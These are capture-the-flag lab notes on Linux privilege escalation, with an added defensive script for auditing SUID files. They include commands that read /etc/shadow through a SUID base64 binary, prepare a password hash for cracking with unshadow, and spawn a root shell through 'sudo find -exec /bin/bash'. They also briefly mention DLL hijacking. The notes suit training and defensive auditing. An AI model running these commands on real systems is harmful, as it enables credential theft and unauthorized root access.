Capstone


Privilege Escalation

Check for SUID files

find / -perm -u=s -type f -ls 2>/dev/null

base64 is among the files with the SUID bit set.

The SUID bit on base64 lets us read any file, so we read /etc/shadow to get the other users' password hashes.

LFILE=/etc/shadow
base64 "$LFILE" | base64 --decode
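
From the defender's side, the same find check can be run as a recurring audit, so that a SUID bit on a general-purpose tool such as base64 is noticed. This is an added example, not part of the original notes; the baseline file and the paths in the usage comments are hypothetical names.

```shell
#!/bin/sh
# Added example (not from the original notes): report SUID files that are
# missing from a reviewed baseline.

# list_suid ROOT: print every regular file under ROOT with the SUID bit set,
# staying on one filesystem (-xdev) and sorted for stable output.
list_suid() {
    find "${1:-/}" -xdev -perm -4000 -type f 2>/dev/null | sort
}

# audit_suid ROOT BASELINE: print SUID files under ROOT that are not listed
# (one absolute path per line) in the BASELINE file. BASELINE is a
# hypothetical file you maintain after reviewing a known-good system.
audit_suid() {
    root=$1
    baseline=$2
    list_suid "$root" | while IFS= read -r path; do
        # -F fixed string, -x whole line: only an exact path match is accepted
        if ! grep -Fxq -- "$path" "$baseline"; then
            printf '%s\n' "$path"
        fi
    done
}

# Usage on a real host (paths are assumptions):
#   list_suid / > /root/suid.baseline      # once, after review
#   audit_suid / /root/suid.baseline       # later, e.g. from cron
# Remove an unneeded bit with: chmod u-s /path/to/file
```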


On our machine, crack missy's hash

Create a file named passwd and copy the missy line from /etc/passwd into it
Create a file named shadow and copy the missy line from /etc/shadow into it
Combine the two files with unshadow, writing the result to the file unshadowed

unshadow passwd shadow > unshadowed

Crack the unshadowed file

Get the first flag

Login as missy

su missy

The flag is in /home/missy/Documents

Escalate to root

Check sudo -l for missy
Leverage find

sudo find /etc/passwd -exec /bin/bash \;

We are root now

Get the second flag



DLL hijacking

Replace the DLL with a malicious one


Exploit known vulnerabilities

Tools
Robber
PowerSploit